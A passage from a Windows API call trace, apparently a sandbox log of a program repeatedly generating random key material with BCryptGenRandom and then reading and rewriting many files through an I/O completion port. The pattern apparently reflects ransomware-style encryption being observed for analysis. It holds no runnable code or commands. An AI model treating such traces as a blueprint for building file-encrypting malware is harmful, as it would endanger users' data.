(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.437] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.437] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.437] free (_Block=0x1ff1e60) [0079.437] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.437] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.437] free (_Block=0x1ff1e60) [0079.437] free (_Block=0x1ff1930) [0079.438] free (_Block=0x77d800) [0079.438] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.438] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.454] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x4c15, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.455] CloseHandle (hObject=0x3c4) returned 1 [0079.461] free (_Block=0x1fb18c0) [0079.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.472] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.472] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.472] free (_Block=0x1ff1e60) [0079.472] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.473] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.473] free (_Block=0x1ff1e60) [0079.473] free (_Block=0x1ff1930) [0079.473] free (_Block=0x77d800) [0079.473] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.479] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xcc20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.480] CloseHandle (hObject=0x3c4) returned 1 [0079.480] free (_Block=0x1fb18c0) [0079.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.492] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.492] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.492] free (_Block=0x1ff1e60) [0079.492] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.492] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.493] free (_Block=0x1ff1e60) [0079.493] free (_Block=0x1ff1930) [0079.493] free (_Block=0x77d800) [0079.493] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.496] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x2c440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.499] CloseHandle (hObject=0x3c4) returned 1 [0079.499] free (_Block=0x1fb18c0) [0079.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.512] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.512] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.512] free (_Block=0x1ff1e60) [0079.512] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.512] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.512] free (_Block=0x1ff1e60) [0079.513] free (_Block=0x1ff1930) [0079.513] free (_Block=0x77d800) [0079.513] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.516] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x2c450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.519] CloseHandle (hObject=0x3c4) returned 1 [0079.519] free (_Block=0x1fb18c0) [0079.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.531] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.531] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.531] free (_Block=0x1ff1e60) [0079.531] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.531] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.532] free (_Block=0x1ff1e60) [0079.532] free (_Block=0x1ff1930) [0079.532] free (_Block=0x77d800) [0079.532] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.535] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x39f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.570] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.603] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdc5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0079.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.624] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xdfc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.624] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.638] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe0b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0079.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.685] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.700] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.700] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.701] free (_Block=0x77d800) [0079.701] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0079.701] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0079.701] free (_Block=0x3db00b8) [0079.701] free (_Block=0x3db01c8) [0079.701] free (_Block=0x77d908) [0079.701] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.705] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.708] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.708] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.784] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.059] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6a91, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.104] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xf26, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.125] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0080.140] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.148] ReadFile (in: hFile=0x3ac, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0080.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.219] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc8f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.219] CloseHandle (hObject=0x3ac) returned 1 [0080.222] free (_Block=0x1fb18c0) [0080.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.234] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.234] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.234] free (_Block=0x1ff1e60) [0080.234] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.234] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.234] free (_Block=0x1ff1e60) [0080.234] free (_Block=0x1ff1930) [0080.234] free (_Block=0x77d800) [0080.234] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.236] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.253] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.254] CloseHandle (hObject=0x3ac) returned 1 [0080.259] free (_Block=0x1fb18c0) [0080.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0080.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0080.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0080.271] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.271] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.271] free (_Block=0x1ff1e60) [0080.271] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.271] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.271] free (_Block=0x1ff1e60) [0080.272] free (_Block=0x1ff1930) [0080.272] free (_Block=0x77d800) [0080.272] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: 